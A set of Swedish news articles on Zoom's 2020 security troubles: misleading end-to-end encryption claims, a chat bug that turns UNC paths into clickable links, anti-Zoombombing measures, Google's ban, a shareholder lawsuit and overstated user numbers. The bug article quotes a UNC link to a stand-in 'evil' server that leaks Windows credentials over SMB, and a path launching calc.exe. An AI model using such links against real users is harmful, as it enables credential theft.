Zooms videochatt är inte end-to-end-krypterad
Även om Zoom själva tycker att den är det

En del av er som har börjat arbeta eller studera online den senaste tiden har kanske fått stifta bekantskap med chattappen Zoom som en del företag, skolor och föreningar börjat använda för att videochatta med varandra i onlinemöten. Appens användande har exploderat i popularitet efter det att distansarbetandet ökade i samband med virusutbrottet av det nya coronaviruset. Zoom uppger själva att deras videochatt använder sig av så kallad end-to-end-kryptering men det stämmer inte riktigt uppger The Intercept. Zoom krypterar trafiken mellan användare och Zooms servrar men videofeeden krypteras inte när den transporteras och behandlas i Zooms system. Detta gör att till exempel Zooms anställda eller någon annan som har tillgång till systemet teoretiskt sett skulle kunna avlyssna de miljontals videochattar som genomförs via tjänsten. Zoom säger själva till The Intercept om att man hävdar att man använder end-to-end-kryptering i sin videochatt: "When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point." Zoom har även en traditionell chatt-tjänst för textmeddelanden och den ser ut att använda riktig end-to-end-kryptering, det vill säga meddelanden som skickas via Zooms chatt-tjänst går inte att avlyssna under transporten från sändaren till mottagaren.

Bugg kan lura av Zoom-användare inloggningsuppgifter
Om de råkar klicka på "elaka" länkar

Bleeping Computer rapporterar att videochatt-tjänsten Zoom har en ganska otrevlig bugg som gör att Windows-användare i värsta fall kan lämna över sina inloggnignsuppgifter till någon obehörig. Buggen består i att Zooms tillhörande chatt-tjänst gör om vissa saker som skickas i chatten till klickbara länkar. Tanken verkar vara att om någon till exempel skriver feber.se i ett chattfönster så ska detta automatiskt konverteras till länken feber.se så att detta blir klickbart. Problemet är Zoom även konverterar sökvägar till Windows så kallade UNC (Universal Naming Convention) till länkar. Det handlar om länkar som till exempel kan se ut så här: "\\evil.server.com\images\cat.jpg". När någon klickar på en sådan länk kommer Windows-maskiner att försöka ansluta till den aktuella servern via SMB-protokollet och då automatiskt skicka över användaren inloggnings-uppgifter. Dessa ska sedan vara hyfsat enkla att dekryptera för mottagaren som eventuellt fångar upp anropet enligt Bleeping Computer. Förutom det så skulle någon även kunna få Windows-användare att kicka igång olika program på datorn genom att klicka på länkar i zoom. "\\127.0.0.1\C$\windows\system32\calc.exe" skulle till exempel starta datorns miniräknare. Det ska observeras att användaren först kommer att tillfrågas om det aktuella programmet ska öppnas. För att komma till rätta med det här problemet föreslår Bleeping Computer att Zoom fixar buggen på sin sida så snabbt som möjligt. Det finns även en workaround som förhindrar att UNC-anrop skickar inloggningsuppgifter automatiskt. Ni hittar den på länken nedan men det är en lösning som jag enbart rekommenderar för någorlunda erfarna Windows-användare (typ ni som har orkat läsa ända hit). Vi andra ska nog mest hålla koll på hur länkarna vi klickar på i Zoom faktiskt ser ut tills Zoom fixar den här buggen.

Zoom gör det svårare att Zoombomba
Med lösenord och väntrum

Det här med Zoom har ju blivit väldigt populärt på senare tid. Men denna videokonferenstjänst har bevisligen en del brister när det kommer till säkerhet. Det har lett till att tjänstens utvecklare har pausat utvecklingen av nya funktioner för att istället fokusera på att göra tjänsten säkrare. En sådan förändring är att Zoom kommer kräva lösenord för att ringa samtal och kommer aktivera väntrum som standard. Dessa ändringar ska gälla från och med i dag och ska då förhindra att Zoombombande troll kraschar dina videosamtal med släkten. Lösenord kommer framöver inkluderas automatiskt med inbjudan för schemalagda möten. Men de som redan har schemalagda möten inbokade rekommenderas att skicka ut nya inbjudningar så deltagarna inte behöver be lösenordet. Väntrummen gör att videosamtalets värd måste godkänna deltagarna innan de kan delta i samtalet. Detta gör ju processen lite mer omständlig för större konferenser men det kanske är bättre än om någon oönskad person hoppar in och gör helikoptern.

Google förbjuder anställda att använda Zoom
Är för osäkert

Den senaste tiden har videokonferensmjukvaran Zoom fått en hel del kritik på grund av sin bristande säkerhet. Företaget har gått ut och bett om ursäkt och lovar att bättra sig på säkerhetsfronten, men det ser för tillfället rätt brunt ut för tjänsten. Nu har det blivit känt att mjukvarujätten Google meddelat sina anställda via mail att tjänsten är förbjuden att användas på deras jobbdatorer. I ett uttalande till The Verge säger talesperson från Google detta: “We have long had a policy of not allowing employees to use unapproved apps for work that are outside of our corporate network. Recently, our security team informed employees using Zoom Desktop Client that it will no longer run on corporate computers as it does not meet our security standards for apps used by our employees. Employees who have been using Zoom to stay in touch with family and friends can continue to do so through a web browser or via mobile.”

Ägare stämmer Zoom för bristande säkerhet
Videoappens säkerhetsluckor har fått aktien att falla

Videochatt-appen Zoom har fått ett enormt uppsving sedan coronapandemin drog in över världen vilket initialt gjorde att värderingen av företaget bakom appen rusade kraftigt. De senaste veckorna har det dock uppdagats att appen har en hel del säkerhetsbrister vilket gjort att aktien fallit tillbaka från sina rekordnivåer. Detta har gjort att en av Zoom Video Communications aktieägare nu stämmer företaget då han anser att Zoom mörkat att deras app inte var end-to-end-krypterad, något som vi skrev om tidigare den här månaden. Förutom det så har appen även drabbats av lite andra säkerhets- och integritetsbrister, något som gjort att flera företag, myndigheter och institutioner förbjudit sina anställda att använda appen. Zooms aktie låg på cirka 70 dollar i början av året men 23 mars fick man betala nästan 160 dollar för en aktie. Sedan dess har en del av Zooms problem uppmärksammats i medier och igår kostade en Zoom-aktie 113 dollar.

Zoom har inte 300 miljoner dagliga användare
Medger nu att användare kan ha räknats flera gånger

Videochatt-appen Zoom har växt i raketfart sedan pandemin drog igång och förra veckan meddelade företaget att man hade över 300 miljoner dagliga användare. Redan då uppgav en del bedömare att detta eventuellt inte stämde och nu medger Zoom att så är fallet. Zoom har nu uppdaterat det blogg-inlägg där man tidigare skrev att man hade 300 miljoner dagliga användare. Istället skriver man nu att man har över 300 miljoner deltagare i sina videochattar varje dag. Det innebär med andra ord att Zoom-användare som deltar i flera Zoom-chattar dagligen räknas flera gånger om. Zoom skriver: "We are humbled and proud to help over 300 million daily meeting participants stay connected during this pandemic. In a blog post on April 22, we unintentionally referred to these participants as “users” and “people.” When we realized this error, we adjusted the wording to “participants.” This was a genuine oversight on our part." Exakt hur många dagliga unika användare Zoom har är dock inget man nämner i det uppdaterade blogginlägget.